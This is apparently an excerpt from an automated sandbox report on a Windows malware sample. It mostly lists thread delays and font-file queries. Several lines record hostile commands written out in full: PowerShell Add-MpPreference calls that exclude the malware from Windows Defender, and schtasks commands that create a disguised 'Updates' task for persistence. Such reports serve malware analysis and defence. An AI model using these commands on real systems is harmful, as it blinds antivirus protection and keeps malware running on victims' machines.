                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99890
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99781
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99671
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99562
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99453
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99342
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99226
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99119
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98843
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98634
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98499
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98336
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98233
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98109
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 97999
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2899755875.00000000011EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                        Source: NxmtwwVGOtEdjd.exe, 0000000F.00000002.2900321221.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Win6
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory written: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory written: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
